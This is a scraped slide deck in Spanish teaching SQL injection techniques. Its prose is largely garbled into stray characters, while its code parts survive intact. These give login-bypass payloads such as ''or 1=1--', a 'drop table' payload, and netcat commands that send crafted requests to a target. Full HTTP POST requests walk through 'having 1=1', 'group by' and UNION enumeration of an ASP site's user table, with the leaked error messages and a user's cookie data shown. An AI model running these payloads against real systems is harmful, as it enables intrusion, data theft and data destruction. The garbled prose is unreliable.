Contenu connexe Similaire à Tecnicas de sql injection (20) Plus de Alan Resendiz (11) Tecnicas de sql injection2. ! "
#$%& ' (
) " * + " ,-
# . / "0#$%
' " , *
) 1 % )" + ! " , *
, ") - **
2 #$% ' " - " "
3 #$% 4
) 5
, ! )
% " "
5 " 67" ) " " " . "
* 8* " ! 6 . "
. 5 9 " , # #$% 4
:) *
* + ;7 " /
# . ; , "
8< + " " = "
" " ) "
>; ) - " .>
5 " , "
4 ' " ; "
4 # ! " 8< # ! "
4 ! ' , *
? #$% 4 : " - " " , "
@ ' "
' " " A "
B * " + % " ' "
C ; "
A " " ' ) "
5. "
"" #
8 " )4 * " &
" 7 " " " ( D
# ) + = * 6 " " " " "
) & " + 6 9 & 6 & "
. " + " " .
! & 9 " " " " 6 ( " " "
. " & . " " 4 " " " "& "=
7 " + " ( " 7< " ) " . (( # +
3. 2
; " " 6 " . " " .& 9 " ) ) * 9
* " " 6 ) + " " " ) "
5 . " & 7 " 6 (&
" " " . 4 #$%& " * " 9 " "
( " " " "
" $
! % & '
5 * " D C 2 . " " ) 4 ) " ) "
6 " . - ' & )4 6 " . 4
" * 9 " * " 9 " ) " " "& 9
" 9 ( " ) 4 ( ) "
& " * ) " * . "
4 " "
% " + 4 " . 4
#8$ 8% ># 8 . " $ + % . . > * 6
* 6 7 " D C & #8$ 8% +
* & 6 " . "& #$% E# $ + % . . F
! * " " " " D " & 9 - ( "
) " " ,- 9 " . &
9 . 4 #$% " 6 + = " " "
E#+) " & : + " * <F * 6 " "
51# CB@ + " #: * " CB
% . . = " 6 " " #$%BC + #$%C & " " )
4 " " " "& + .= . " 6 " " 6 " "
"
+& " D " " >! #$%> " 9 4 "
9 " " . 4 ) ) " 6 "
& ( 4 " " . " 4 " "= 9
. & 6 " " #$%2
" ) " " . 4 " . 6 "& 9 " +
9 " " " " 6 6 " 6 . 4
"
( ) * # +,
$ ( " " " " " ) " " " 9 - + " * &
) 4 ) 4 " " 9 " = " " = ,:# ! 9
"& 9 " * " & " ) ) 4 9 " 6 "
2 G " E, . * & " 6 " " " "
" " F& " * ) " D= " " ) " ) :# & " " " )
" ) " . " 6 " !' " "
%51
4. 3
5 ) & " " C & 9 " " . ) " " "
( ) " ) & ) 9 . ) "
" 6 " 7 9 9 " )
4 & " 9 " ) * " " -
" . = " 6 6 " # & E! 9 "
) " 6 " 2F " 9 " * ) 4 = " *
9 " ) :# 2
% " 9 " 7" " " & +
) " " " ) " & " * * 9 - " . =
" :# " 9 " * & ) = )
9 " ) " :# 2 G " 1;
8 " " & " * ( ) 9 " 6
" " 6 & 9 = " . " 9 6
6 " .
' " & 6 " 9 " )= " #+) "
" - " , " 9 . :# +
" * G " 1;
, " * D CC = 6 " ) #0#$%& ) 4
) > " * #$% # 6 3 * G " 1;> H " & "
( = ( " " D CC2
, " " & 67" " " * #$%& " * "
6 " 6 " " " . E#$% F& 9 ( " . " "
" " " & " + CC? "
#$% @ " & " 9 " " " 9 6 "
#+) " G " 1;& + . #$%
CCB " * 0 " ) " .
. 6 " " "
5 ) . " & " * #$% " 6 " &
9 " " " " I ) & "
9 " ) " * " ) .
" - " , " ( #$% # 6 & " 6 ) "
9 " . " " & "
. " " "& " " " " 6 4 " "
" . " & 9 " " "
" " "& ) = " 4 6
" . . " " =" "
"- .# / ! 0
' 9 * & " " * &
* " 9 6 9 " " " * " +
9 " " "& " " " ) "
6 "& + " " #$% # 6 " < " .
5. ?
# ) " ) + " " #$% ) " &
4 & * " " ) " " ) " " . 9
)6 ) = " ) 4 . & " 9
. " " & " 9 & "
& " + ) " ) 4 " E' "
" J " " " " #0#$% # 6 & 9 "
6 " " F
8 " " & " . " " ) " " 9 "
6 ) " " " " " " " #0#$% 9
" . & 6 6 " 9 "
. " )4 6 & " 7 " #$% 4
%# )
; . " & ". " *
" " " " + " 6 "& 9 4
" " #0#$%& " "* " * & 4
" " "& 9 ) " . 6 "
8 " #0#$% " . " "
>#5> + . " = " & "" * "
" > > E- KKF
8 " 9 . " = & 9 6
" #5 " ( . " " 6 4 " EIF " #0#$% # 6 &
) " " ) " " " & " ) 7 " " 6
" < " 6 . "& " 4 & " "
< "
( 1 ( * $# + )
#0#$% " < " " "& ) = " 1 % )"
6 L"& " 4 " "
. " " < " " ) 4 "
5 " " 6 " E#51& 5 ; M& !N #!N& ;'!& F + = "
" " ( 9 " 9 " " *
" " & " " " ;'! ! + 1 !
5 " + " 9 "
E8" F ( ) " " & " 6 #0#$%
# 6 & " " ;'! 332
5 ) " ) " I . " 9 .
" ) " + ) 4 "
6 " 9 " " "
+ * " " " " ) 9
" " ) " " " . & 9 " #0#$%
" & *
6. @
8 * 6 " ) " " = " " D "
6 #$% E! 4 #5 "" > >F " " " "
7 " + #$% " 9 6 " . "
& " 9 ) 7 "& " "
6 "& . ;:,:# " " " ) "
" 6 )
1
+ ( & ,#))
; , 6 % * " >; ! * . " *
#$% # 6 > O#$% # 6 " * " " " , ") "
- ** " " " > 8" " . * 9 1: < " 6 "& "
9 " " * * " + " "
6
P & " " " " 6= " 9 " "
" ,! " #$% # 6 " & "
) . " " " " " "
< "& 9 + " " ) < & " " "
" " 6 ) "
# ) " " " "
* " ") " ) ** #$%&
9 " " ) > M . 8< " G " >&
" ) " ") ) ** " ) " "
" " " >" 6Q * EF>
5 " < = " > M . 8< " G "
> E #-1 B303B 022CB0@F " " 9 (
< )
< Q M9
< Q " "
< Q <
< Q" "9 " +
< Q"9 .
< Q " "
< Q" 6
< Q " + "
< Q 6)
! -"""
" Q
" Q
" Q . +
" Q " +
" Q " +
7. "2 % & ,
; " ) & #$% " . 4 " " 5 "
" * " < " " " " " E!%0#$%
" : & ; " 0#$% " " * F "
6 "& < " . " " " "& . " "
" " & " * * " 6 (
" " " . "
% & +% + % ! .# . &
/ 51; ( . " "
8H:R8 ( 6 " "
,81S ( . "
% & ++ + + ) .# . &
' 85;8 ( 6 " ) "& " = "
, :! 8 ) " = "
5%;8
( * " ) " . . "
) * " "
% & + + #! .# . &
#8%8';
( " . " " ) " " 9
" "* .
1#8 ;
( . " " ) " "
J
!,5;8
( * " 6 " " " +
. " " " * "
,8%8;8
( . " " ) ) "
"
%! # #!
% " " " " " * ( " * " " 9
" "
%! # #!
A :
( " * ) " 6
" " . " "
G 8 8
( " * " " 9 )
" . " " 9 " 6 "
/ : ! -S
( " " . " " " "
. " " =* "
5H 1/
( < " 9 ) " "*
.
: ,8 -S
( " . " " " "
" *
8. B
3 % &
T 9
U + 9
TU , "
TV . 9
UV + . 9
V . 9
-8;G881 ( " * 6 6 "
% R8 (
1 ( " * . " " ) " "
4 & !
SELECT * FROM Tabla;
E8" " 6 6 " " " . " " ) >; ) >F
UPADTE Tabla SET password = 'Juajuajua' WHERE user =
'admin'
E8" " ( = "" " &
6 F
5 ) & " . 4 #$%& " * 9
4 " " "& " 9 " " * "
" " +
4 " #$% " & " "
" 4 " ! . * & = " "
* 4 " ) & " " " "
4 " " & 4
# ) " & " 6 " & " +
" " 9 6 " . "
& " " " 6 " 9 9
7 + #$% " " )
"5
#
# 6 7 " 9 . ( . * " 9 "& " .
" = " . " " >5 9 "
H ) " ' 8 >& " 9 * 6 & " " 9
" ) & & " " " #$% ) "&
9. C
" 6 " ) & )4 6 *
" " " = "
# ) " < 6 " " ) " "& "
6 " ) " . * & "
9 " " * " " 6 " 6
9 " . " 6 " " " <
+ . " " ) " " " " 6 )
5 " * " 4 . 4 J . " &
! " # " & " * "
" 9 . " " " 7 " " " 8
" & + )4 6 . .J
" " " & "
" ! " # & ) 4 " " . " "
0 8* " ! 6 . "
0 5 9 " , # #$% 4
0 :) *
0 8< + " " = "
0 ' " ; "
, " * & " 4 * 9 * + 9 .
) 4 " . " )4 6 " "
* " 6 "
( 6!
# ) 7 >#$% 4 > " ) J
) " " " * #0#$%& " 9 . "
9 " & " & 9
" " 9 )
. < 7<
8" " . * 9 " " ) " " " " " " 6
( " . " " * " 9 6 " " < " * "& "
9 & . " ". *
8" " 6 " " " =*
" " 9 + " " " G " * # 6 "
4 " ) " " 5#! ) " " " #0
#$%& " " " G " 9 *
" 6 " )
+ 4! $ (! &
5 9 " =" " 9 " "
" 6 ) & * " ( " " "
+ .= " " " < 7< "
10. 8 9 + = " " " ) ) " ) 9
( 6 & " 9 ) 4 " "
" 9 " 9 " " " "
8" " ) 9 + = " " "& " 6 "
6 ) " "& ) "
" 6 " & " " 6 "
6 ) " " " " 6 " " 6 )& " 9
) 7 " * " " " ) " "
; " " " * " )& " " : % &
" " " & " " " " 6 "& + " ) * "
* " " 6 ) . " " ) "
+ " D
:M& " ) 6 " * + =
" " " " 9 " " . ) "
" ) M. & " . < " "
" + " " * " "
8 "& ) . ( ) " "
" ) .J " " " *
& 6 ( = " = " 6 " . " ) " .
"
<FORM action=logon/logon.asp method=post>
<input type=hidden username=_UserName password=_Password>
</FORM>
8" * . . & ) " " " " . " " . 5#!
9 " " 6 " & ) " " E!
+ J " " ( ) * ; %& 9
. 5#! " < ) " "& .
" " " . " " * ; % + 6 6
" " F 8 * 6 + ) ) & * &
" . " " + 6 . "=
select * from users where username = _UserName and
password = _Password
5 ) 9 " " " " & ( " " " . &
* " 6 " " " . "II ) " " "= + & " .
" " 6 6 4 & " " &
11. + ) ) " " ) "
< " % " * " "
http://www.objetivo.com/libreria.asp?edicion='Noviembre'
! " " & " % = ) " " "
" " 9 + " . "
" ) + ) " " " .= EN,F ) 7 " "
L1 6 ) L " " " 6 . 5#! 9
" 8 " " & + ) )
) 4 . . ) " " "
"* " " " . 9 * 6 " 6 . "
select * from numeros_anteriores where edicion =
'Noviembre'
" & " 9 ) " " " * " " ) "
#$% > 6 >& = " " 9 " . * 7 "
" . & + . " + " + 9 ) "
" " " " & " " " 9 +
#$%
5 6 " " " * " " 4 " " "
& " " ) " " + " ! & " " L
E' # F ( " " " )
" " ( ) 4 " ) +
.
% L E' # F " " * #$% # 6 *
"& " 9 " 6 9
" 4 " * " 9 6
& " 9 " " " " )
9 + #$%
H " 4 9 = " " " " " .
) ( * . " + )
" " " & "
Usuario : An'gel
Password : 338xD
select * from users where username = 'An'gel' and
password = '338xD'
12. select * from numeros_anteriores where edicion =
'N'oviembre'
8 ) " " " 9 " 9 " " " " " " "
#$% # 6 & " 9 " & " 9
" . " . ( " " +
" . "
username = 'An'
edicion = 'N'
% . & " . 9 " . " * "
"& #$%& * " ( & 4 "
" " & " 9 9 9 "
" " " + & " . * #$% # 6
5 ) 9 " = " " . + * . " 9
" " " L5 L + L1L II
8 " & . " " 6 " 9 9 " .J 6
6 67" ) " " + " " * "
" 4 " * " %& " " " ) "&
" " ( 6 & ( .
"
8" " * 6 & " 6 9 " " " " "
" " " )4 6 + ) 4 " " " " )"
" ) " " . " . & " " " " "
" " 6 "& " * " 9 " .
) " "
8 * 6 & 9 " " " . " " &
" " 6 6 . & ) ) . " .J . 7<
+ . )
A ) = " ) 7 & " " " " 6 "
& 9 " "
E84 " " ? >8 # 6 >F " 6 "
" ) 7 " " . & 9 + #$% " 6 ) " " 9 "&
9 " < 9 ) " " ) 4 + " (
7 " " " " ' " ' & " ) 4 > . #$%
# 6 " . #$% 4 > EH B * " + " "F
( ( 9 " " * .
6 ) " 9 " . " <
13. 2
1 $ %
&
' (#)*
+! , - . , / %
0 ,
, 123
% &
- & ) " 6 9 * & " " " &
" ) " " " ) ) "
* " " " ) " " + "& . "
" I " + = " " "& + " 9 " .
& " ( .J ) " E! * >. . >F
) " " 9 " ." > . " > )
" " " . " " >% " ' ">
)4 6 6
6 7 ! 8 ( .
" 6 " " 7 " #$% 4 & " * 9 "
. " 9 " " "& 9 . " "
; %& 5#!& & " " " 6 ( 9 " < #$%
# 6 ' " 9 " ) "& "& .J "
6 ) & " & 4 & . " + ) 4 *
& 6 " " * " EH > % " ' ">F
# ) & " > 6 " > + = " " " = "
* " 6 & " " . 9 " ) ) + = " " " " "
9 & 4 & " " . " . " " "
) "=
8 " " & . " " 6 ) "
" 6 " # ) . " " " " ) "
* & 1: ) ) " & " " " " * " *
" " & " 6 " 6 "
" " ) E8" " ) "& ) 6= " "&
" ) 6 " + . F
9 ;:,5 * & 6 " " > "> " + J
9 " " " 6 ( " . 9 " )
! " " 6 " & . " =
& " ( . " 7 " " " 9 . * ) "
. " " 7 & "= ) 7 * 9 "
=
14. 3
$ (! 6) $ (! ) & 3(
" " "
" " .= "& : 0%
! . " " & #
86 " : 0% & "
, " " +
* " .= & ! . "
" " " D " 9
" 6 " + ) " < "
" + * " " " "
" " " . *=
" "
"
- & 9 4 4 4
) " . "
4 " " " " " " " "
" ) "& 9
" "& " . "
" 6 "
* .
/ = " + "
5 " "
" " & )
) *
"& ) . " "
+ * "& " " ) 6 " "
"
! " " " . " . I ) & " 6 "
" * " "& " E> L >F * +
" 6 " * " ) 6 "
H 7 " " + .J " "
" " . " #$% = " " " * 9 "
" " . " " .
! " 9 + = " " " " "
* " ) * ; % 5#!& * " "
= " " 9 6 " 9 " " " 6 "& . "
# 5 : + !5##G: , " " .
. 5#! 9 ) " + 6 #$% ; ) 7 = "
" 9 * " " 6 #$% " < " "
. " " " 4 "
! 6 " 4 8" " * . < = " )
6 ) & . *=
---- Extracto -------------------------------------------
<FORM action=ingreso.asp method=post>
<TABLE cellSpacing=1 cellPadding=3 width=440
bgColor=#ffffff border=0>
<TBODY>
<TR bgColor=#ff0066>
<TD><B><FONT face="Arial, Helvetica, sans-serif"
15. ?
size=2>Nombre</FONT></B></TD>
<TD><B><FONT face="Arial, Helvetica, sans-serif"
size=2>Clave</FONT></B></TD></TR>
<TR bgColor=#ffcccc>
<TD><INPUT name=USERNAME> </TD>
<TD><INPUT type=password value="" name=PASSWORD>
</TD></TR>
<TR align=middle bgColor=#ff0066>
<TD colSpan=2><INPUT type=submit value=INGRESAR!
name=SUBMIT>
</TD></TR></TBODY></TABLE><BR><BR></FORM></TD>
<TD vAlign=top align=left width=10> </TD>
<TD vAlign=top align=left width=140>
<TABLE cellSpacing=0 cellPadding=0 width=140 border=0>
<TBODY>
---- Extracto -------------------------------------------
! " 9 * ( = & ; % " "& + "
4 . 5#! E! " " & . " " F
5 ) & " " 9 ) 4 ( . " " & "
9 6 " " " " " "&
" " " 9 * #$% " 6 " " ) "
) . 9 + " 6 " "
select * from users where username = 'Angel' and password
= '338xD'
! " " 9 " " + "" 9 . ) < "
) " " 9 ( " * 9 = 6
( 6
) " " ) * " "
) #$% 4 " I :M& 6 "
" * = " " + . "
" " + " D . " 'or 1=1—
Usuario : 'or 1=1--
! "" L V W
A 47 " "& 9 = " . ) +
.
select * from users where username = ' or 1=1-- and
password = ' or 1=1--
16. @
1 9 " 9 " < " " " >: > 9 " &
" " " 6 6 " 6 E " 6 " ) F &
. + = " " " " " " " . " "
1 ( ,
0 4
Usuario : 'OR''='
Password : 'OR''='
5
4/
' ) & " " 6 + 6 4 .
" > " ">& " " " > 00 > E, ) / F "
#$% ( & " "
"& #$% 9 . 9 6 .
. +
# ) " " 7 " . " 6 " 9 . "
< + " & " & " 6 "
& " ) "& " . "
" & ( " 6 .
# . 4 & " " " " " " 9 < "
" " )4 6 & .J " * >5 > > > " =
+ . "
Usuario : Admin'--
Password : 'or 1=1--
8 = & " 9 " " = " " " .
select * from users where username = 'Admin'-- and
password = ' or 1=1--
# " * "= + " . 4 & ) ) + "
.
8 " & " 6 " ) 6 " " " > L >
E' " F " " + > 00 > E, ) / F
6 9 " + " < "& " ) "
17. " " > " . "> 6 " ) "& 9 "
" " " .
) 4) # $ 7 ! . ! #
5 " " " " " * " <
#$% + . & " 6 " ) 9 6
6 . " " ) " * " " " " . 9
" "
' + = " 9 " " & . + & = "
* & ) 4 " > < " . > 9 " + * .
" + " " " " " "
! " 9 . E' + < " F& " " "
"& " " " " " . & . 9
9 " J " " ) " " "& + " 9 "
6 " " " & 4 & " 6
* " " " " " 6 " " "
" ) 4 & " 6 " 4 & " + *
" " " ) " < 6 . &
. " 9 " " " . "
" " 6
5 " * " " ) " * " " "& "
6 6 . " " ( " " "
9 D ) "9 " + *
" " * "
1 7 ! $ 7 ! . % #
"
' ; #$% # 6 & + " 6
" " 6 & " 6 . " " 6
##$%#8 H8 & " >
< > < Q "
) & " ) + > > " " "
" ) " " #$% # 6
)Q
) " ) " ) " " *
) ) "& 6 " )4 "& +
. ) " " *
" 1
) " " )4 " ) " "
" . " 8 4
" " " " " . * .J
8 " " "& "
" . * " " " " ) " +
6 " "
18. B
. 6 9# + &
% " 9 " , . # 6 & . & " " " D " &
" 6 " " " " " E' = " 5 F
" " E8 " " * 9 " 9 " .
) " = " & 4 " " 6
" ( + ( & F
5 * " " " " " 9 " 6 " " &
9 6 " & " .J ) . 6 9 J *
9 " & . 4 & " " " " 9
= . " " 6
8 6 " " & M " " *
" & 6 ) + #$%& = 4 & &
9 4 " " "
Usuario : '; drop table usuarios--
Password :
# * & " " 6 . "
* EH " >8* " ! 6 . " >F &
) ) ) > " "> " & 9 "
& .J " * " * "
' & + " " " & 6 "
6 ) ( " " & 6 5"= + &
" 9 , # " " " " 9 " .
7 " " ) "& 9 ) " ( & ) = "
+
1 $ % %
+ 67 & 4/
) . $
: 3( ) & ! #&
! ) ) " * " " " " (
7 " #$% 4 & " " " ) " 9 )
" " :,-' :%8 ,- 4 " #$% # 6 .
( D "
# ) " " 9 & " .
" & " " . 7< &
" " " E " 9 ) " " ( = &
. ) " 6 "& . " ) " 9
& + " " ) " " " * F
19. C
" 9 " " " 6 ) " + *
1 8 .1)
8 & " 9 6 ( " 6 " & 6 "
" " 6 " ) " " " 9 "
6 ) " "& . "
+ * & " " * 9 " <
" " 4 " " & + " " " 6 " "
" " + " 6 ( "
! " " " . 4 & " " " )
" > L > E' # F "
" D * " " .
Warning: SQL error: [Microsoft][ODBC SQL Server
Driver][SQL Server]Unclosed quotation mark before the
character string '')'., SQL state 37000 in SQLExecDirect
in php/db_odbc.inc on line 61 Database error: Invalid
SQL: Select * from usuario where (usuario.login=''')
ODBC Error: 1 (General Error (The ODBC interface cannot
return detailed error messages).) Session halted.
- & 6 " 9 * " < " :,-'
:)6 " " " * #$%
% < ) " " " . "
E > )Q ) >F
2 ! " * )Q ) & " 9 "
3 8 ) ) " " ( " > " >
? " " " " > . >
- & " 9 6 + " 6 " . * 9 +
. " " :,-' 8 )Q )
1 3
%
)
010.8#* - "3.9$
(")-#) :;<<
123
20. ----- Fragmento -----------------------------------------
<?php
/*
* Session Management for PHP3
*
* Copyright (c) 1998-2000 XXXXXXXXXXXXXXX
(XXXXXX@XXXXX.XXX)
* Modified by XXXXXXXXXXXXXXXXXXXX
(XXXXXX@XXXXX.XXX)
*
* $Id: db_odbc.inc,v 1.3 2000/07/12 18:22:34 kk Exp $
*/
class DB_Sql {
var $Host = "";
var $Database = "";
var $User = "";
var $Password = "";
var $UseODBCCursor = 0;
var $Link_ID = 0;
var $Query_ID = 0;
var $Record = array();
var $Row = 0;
var $Errno = 0;
var $Error = "";
----- Fragmento -----------------------------------------
- " " " " >" " > 6 " "
6 " " 6 ) " X " + X! "" " "
. & " 9 " ( " " " . " " 6 " " " "
* & . " 6 4 * . 9 "
* & " "& 9 * 9 9 6 " #$%&
A " + 6 & " " . " 6 "
" " . " " < 9 " 6 "
* " " " ) E8 " " = ) "
)Q ) F
: ) & * / !
:M& 6 " " 9 + #$% + "
* 6 " ) " " ) "
"& * .
+ " " " ) 9 4 * "
+ . & " 9 4 " " ) " 6 +
.
21. 8 " " 6 " " " " ( &
" ( 7 " #$% 4 & "
"
! " 9 " 6 " " " * & . "
6 4 6 " " & " " 9 "
" ) "& J " " ( 9 " "
" ) " " ) < 9 6 7 " ;;! " 6
"
# " + ) " " ' % E8 M
" " B * " + % " ' "F&
9 " " " ) 4 E5 . 6 &
" . F " . . = "
- " 9 " 6 " " " " 6 " * "
7 " ;;! " )4 6 & " < " "& (
9 D " 6 " < & " " " 6
< & " . *
nc -vv www.objetivo.com 80 < sentencias.txt
' "
' + " * " " ;;! *
& ( " ** * E8 " " * # +1 & "
8 9 F& . . " ) )4 6 . "
) " + " D " * " E5 . ) " " " F& " 6
" "
8" * "
POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 34
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=Angel&txtPassword=Angel
Y Y
Y H . " >! "" >
22. Y * . "
Y
H . " > " >
* . "
- & " . 9 " " * !:#; )
" " ** 6 < 9 4 < & " "
) " " " .
! " 9 " " . + " ) 9 " "
" " ) " + ) > L > E' " F
* & 6 6 " & )
( " ) " * ) ( 6
* ! " " 6 " " " " " " #$% 9
" " E 6 .& . )+& F
8 )4 6 " " ( > > " " ' " "
" " > "> #$%& " * " 6 " * " 9
6 9 #$% E 4 6 < & " 4
:%8 ,-F ) " " " " )" 6 "& " 4 " * 6 "
" 6 " "
H 6 " " " 4 < 6 " " " * "
( " 7 !:#; 9 " ( " 6= (
" ) 4 6
POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg,application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 46
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=%27having+1%3D1--&txtPassword=Angel
Y Y
Y H 9 6 "
Y >! "" > *
Y . "
Y
H + L 6 . V 00 E8 Z 6 .[ Z2, 00F
23. 2
1 .
$ " =
3 )*1(
5*'>
! ) 6 " " " . " " " 6 !:#;& " 9 "
" " ) " > "> " " " " ;;!
% ) " " ( * " "
9 6 " 6 "
! + 4
' # Z
] ! + ' Z2-
, " ! " Z25
O O 8" [ Z
V # . . Z2,
& ' Z '
E ! 7 " " Z B
F ! 7 " " Z C
U + Z28
T Z2'
5 )
!
[ " Z -
0 " 0
^ - M # " Z?'
Q " Q
:MK 9 " ( " 4 < & " " " " (
" 6= & + 6 9 " ! " 6 "
6 = 9 " 6= " "
" 9 " 6 " 9 " & + 6 " 9 "
" " " " )
8 "
nc -vv www.objetivo.com 80 < Injection.txt > result.html
- 6 " 9 " 9 . " " + > 6 .>&
) " 6 " * " 9 4 " "
! " " " & . " & " 7
* " 9 " " * " )
" " " " + "
H " 9 4 " "
24. 3
Microsoft OLE DB Provider for ODBC Drivers error
'80040e14'[Microsoft][ODBC SQL Server Driver][SQL
Server]Column 'USUARIOS.UserID' is invalid in the select
list because it is not contained in an aggregate function
and there is no GROUP BY clause.
/Login.asp, line 85
! * KK " " " & " )" 6 9
" 4 " & 6 :,-' #$% # 6 " 6 6 )
) ) " " ( * " " . .
E # 5 :#F& "= ) 7 " E " ,F
5 9 " ) ) & " * " = &
" 6 6 " " * 4 < + ( " " * "
" "& " " " ) # 5 :#
H " 9 = " * " 6 !:#;
POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 71
Connection: Keep-Alive
Cache-Control: no-cache
Cookie:
ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;xxxxxxxxxxx
=COUNTRYNAME=Argentina
txtUsuario=%27group+by+usuarios.UserID+having+1%3D1--
&txtPassword=Angel
Y Y
H 9 6 " Y
>! "" > * Y
. "
H + L. )+ " " " , 6 . V 00
% . 4 6 " = & 6 " " .
"
Microsoft OLE DB Provider for ODBC Drivers error
'80040e14'[Microsoft][ODBC SQL Server Driver][SQL
Server]Column 'USUARIOS.UID' is invalid in the select
25. ?
list because it is not contained in an aggregate function
and there is no GROUP BY clause.
/Login.asp, line 85
6 ( " " " & " 9 " " > 6 .>
" 6 ( " >. )+> " )
+ " , ) # 5 :#& " " ,
# . " .= & " " " " " +
" " 9 ) # 5 :# ( "
> . " > * " " "& "
> 6 > " ) " + 8" " =
*
'group by usuarios.UserID,usuarios.UID having 1=1--
#! ! *
Microsoft OLE DB Provider for ODBC Drivers error
'80040e14'[Microsoft][ODBC SQL Server Driver][SQL
Server]Column USUARIOS.Nombre' is invalid in the select
list because it is not contained in an aggregate function
or the GROUP BY clause.
/Login.asp, line 85
*
'group by usuarios.UserID,usuarios.UID,usuarios.Nombre
having 1=1—
#! ! *
Microsoft OLE DB Provider for ODBC Drivers error
'80040e14'[Microsoft][ODBC SQL Server Driver][SQL
Server]Column USUARIOS.Email' is invalid in the select
list because it is not contained in an aggregate function
or the GROUP BY clause.
/Login.asp, line 85
26. @
*
'group by usuarios.UserID,usuarios.UID,usuarios.Nombre,
usuarios.Email having 1=1--
#! ! *
HTTP/1.1 100 Continue Server: Microsoft-IIS/4.0 Date:
Fri, 14 Feb 2003 20:02:22 GMT HTTP/1.1 302 Object moved
Server: Microsoft-IIS/4.0 Date: Fri,14 Feb 2003 20:02:23
GMT Connection: close Location: PaginaPersonal.asp
Content-Length: 139 Content-Type: text/html Set-Cookie:
xxxxxxxxxx=USEREMAIL=rcesar6%40hotmail%2Ecom&CHATNAME=&US
ERFIRSTNAME=roxana&COUNTRYNAME=Argentina; expires=Sun,
16-Mar-2003 05:00:00 GMT;path=/ Cache-control: private
Object Moved
This object may be found here.
:M 9 =& " )" 6 " + )
" . > " " 8 > 8 9
" " 9 & ) " . * ) " . "
> > " ( " #8%8'; . E/ " 1
F A=4 " 9 " " !:#; ;;! 1: " & " 9
" " " 6 . " " " "
) " "& 4 6 9 #$% 6
+
E8" " L. )+ " " " ,& " " ,& " " 1 ) & " " 8
6 . V 00F
, " & " " 9 & * "
* " " " " ) &
( " " " . "
' & . " " " " " . " 9 ;:,:# " "
) " " #8%8'; . & " "&
9 + 9 " " " " #8%8'; " + 9 *
" " II 6 " 4 < " #
9 " * " " .
SELECT campo1,campo2,campo3 FROM nom_tbl WHERE campo1=x
AND campo5=y
27. ( 7 E8" " >. )+> + > 6 .>F "
) = " " ) " > >& > > + > 2>&
" ) = " < " > ?> E, * " " 9 "
. * >#8%8'; _ A : ` a> " = " & " * )
" + " " " 7 F " " " " " "
) ( . " "
POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 297
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=Ups%27+union+select+b.name%2C1%2C1%2C1+from+sy
sobjects+a%2C+syscolumns+b+where+a.id%3Db.id+and+a.name%3
D%27usuarios%27+and+b.name+in+%28select+top+01+b.name+fro
m+sysobjects+a%2C+syscolumns+b+where+a.id%3Db.id+and+a.na
me%3D%27usuarios%27+order+by+1+desc%29+order+by+1--
&txtPassword=Angel
Y Y
Y H 9 6 "
Y >! "" > * . "
Y
Y
H + "L " ) & & & * "+" )4 " & "+" "
) V) VL " "L ) E" )
* "+" )4 " & "+" " ) V) VL " "L
)+ " F )+ 00
- 9 " " " III H "& ( " +
> "> = ) " 9 " " # * " (
" " . & " "
+ % . " 1 :1 " . + 9
" " " & " " " " ) " " "
#S#:-b8';# + #S#':% 1# " > ,> * 9
" ) " 6 (
" ;:! E8 " " F % " " " (
1 6 9 " " 6 " #8%8';
7 " "& "= * 9 ) 6 " "
28. B
4 ;:!& " 9 . " "
;:,:# " " ) )4 6 "
!:#; 6 ;:! F
% " 9 = " ) " " " . " "
" &
Ups' union select b.name,1,1,1 from sysobjects a,
syscolumns b where a.id=b.id and a.name='usuarios' and
b.colorder = 48 --
7 " & 4 " 4 " + J . "
" " E! 4 9 " " " " " ) (
" > >F
! 6 " " " 7 " 4
Microsoft OLE DB Provider for ODBC Drivers error
'80040e07' [Microsoft][ODBC SQL Server Driver][SQL
Server]Syntax error converting the nvarchar value
'UserSubPLUSDate' to a column of data type int.
/Login.asp, line 85
:M& 6 " :,-' " " 9 )
) # 5 :# " > " # )!% #, > % . " &
6 " . ;:! + " . " " " "
) " + "
:- .# ! #& +
5 ) & & + " 6 ( 9 " "
" . 6 " & ) " " ) " ) + "
"& " 9 ) 7 " " 6 . " 9
" " % . " & " " " #$% > 1 :1>&
D * ># EF> "
# ) " 1 :1 " " " " >) " "> 9 " *
. 4 #$%& " 9 " J " * "& " ) "
J 6 " ) " " ! 4 & " " J
1 :1& " " " > >& )
" " " " " ) " "
